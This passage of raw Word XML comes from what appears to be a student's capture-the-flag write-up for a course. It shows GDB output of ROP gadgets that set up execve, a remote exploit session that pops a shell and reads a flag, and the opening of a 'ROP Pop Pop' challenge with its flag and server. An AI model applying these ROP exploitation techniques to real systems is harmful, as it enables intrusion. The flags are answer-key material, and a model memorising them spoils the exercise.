              <w:t>code:x86:64 ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FDFDFB" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">     0x400643 &lt;gadget_5+1&gt;     mov    rbp, rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060532FF" w14:textId="77777777" w:rsidR="00017682" w:rsidRPr="00F56DE3" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> →   0x400646 &lt;gadget_5+4&gt;     </w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop    rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2239BEDE" w14:textId="5F242BEC" w:rsidR="00017682" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">     0x400647 &lt;gadget_5+5&gt;     </w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ret   </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40D38CC8" w14:textId="522D2E2C" w:rsidR="00847435" w:rsidRDefault="00017682" w:rsidP="00017682">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Registers, Stack, and Operations at Breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCAF2C" w14:textId="41BADF7B" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56DE3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs, all registers have the necessary values to call </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56DE3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t>. When the program continues, it opens a shell</w:t>
      </w:r>
      <w:r w:rsidR="00F56DE3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F56DE3" w14:paraId="15DEC29B" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="237334AE"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gef</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>➤</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  $ c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B8B854"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Continuing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3049AF81" w14:textId="6A841C12" w:rsidR="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>process 178693 is executing new program: /usr/bin/dash</w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DDC6683" w14:textId="22511D14" w:rsidR="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68EEA5" w14:textId="265AAF63" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435"/>
    <w:p w14:paraId="243F6CA2" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRDefault="00F56DE3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D980A9B" w14:textId="7E412543" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00F56DE3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017FA99" w14:textId="75E8C1F8" w:rsidR="00F56DE3" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The payload causes a stack overflow, leading to a system shell on both local and remote instances of inspector:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F56DE3" w14:paraId="337CF154" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="18DBE997"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kali</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>kali)-[~/Desktop/6-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479CF7C3"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 python3 Inspector_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD9BD44"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 Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3EDA35" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5545EA82"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 whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76427376"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pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5467D5"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 pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37203ADC"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home/pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7ED3B9"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 ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8D5D31"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flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="303CD361" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>inspector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2885FB05" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ABAF9C" w14:textId="36FBACEF" w:rsidR="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>flag{inspect0r_gadg3t}</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B42EE84" w14:textId="77C370F5" w:rsidR="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Remote Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E0779" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">All of the code used to debug and exploit inspector is available in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendix_D:_Inspector_Pwn.py" w:history="1">
        <w:r w:rsidRPr="007704F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53628B0E" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D815D" w14:textId="039E4325" w:rsidR="006C5A4E" w:rsidRPr="001215EC" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc161243436"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ROP Pop Pop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="17D88822" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="00530A29" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc161243437"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5A4E" w:rsidRPr="005264D0" w14:paraId="21612700" w14:textId="77777777" w:rsidTr="008A799C">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68EB2E6E" w14:textId="4E065543" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>ROP Pop Pop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5A4E" w:rsidRPr="005264D0" w14:paraId="6A7FCF01" w14:textId="77777777" w:rsidTr="008A799C">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2721FA33" w14:textId="699131E1" w:rsidR="006C5A4E" w:rsidRPr="00DA733E" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5D885024" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="00EE0A5C" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="51775835" w14:textId="1594A07F" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="0070558B" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0070558B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{sodapop_shop}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5A4E" w:rsidRPr="005264D0" w14:paraId="470700F6" w14:textId="77777777" w:rsidTr="008A799C">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44354CD4" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4BD13755" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="00EE0A5C" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="34449B4F" w14:textId="3658F20E" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF2F28">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>offsec-chalbroker.osiris.cyber.nyu.edu 134</w:t>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5A4E" w:rsidRPr="005264D0" w14:paraId="120B7060" w14:textId="77777777" w:rsidTr="008A799C">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72BCC058" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E2BEE26" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="00EE0A5C" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="065BFD27" w14:textId="0C471102" w:rsidR="006C5A4E" w:rsidRDefault="0070558B" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>LibC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5A4E" w:rsidRPr="005264D0" w14:paraId="5CECF85F" w14:textId="77777777" w:rsidTr="008A799C">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5BE2D6FC" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="005264D0" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="285E5FA9" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="00EE0A5C" w:rsidRDefault="006C5A4E" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="47888F44" w14:textId="3809CB98" w:rsidR="006C5A4E" w:rsidRDefault="0070558B" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A013818" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc161243438"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5594CA02" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="00847435">
      <w:r>
        <w:t>Apologies in advance, I finished this one quite close to the deadline so this writeup is going to be …less polished than the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7B913" w14:textId="75A53900" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="00847435">
      <w:r>
        <w:t>When ran, rop prints a message, takes in user input, and then exits.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5A4E" w14:paraId="2122C382" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="39793353" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>kali)-[~/Desktop/6-Week/ROP-Pop-Pop]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B2CDEB" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">└─$ ./rop      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B92973F" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Can you pop shell? I took away all the useful tools..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C165E0C" w14:textId="21C134DD" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Absolutely!</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
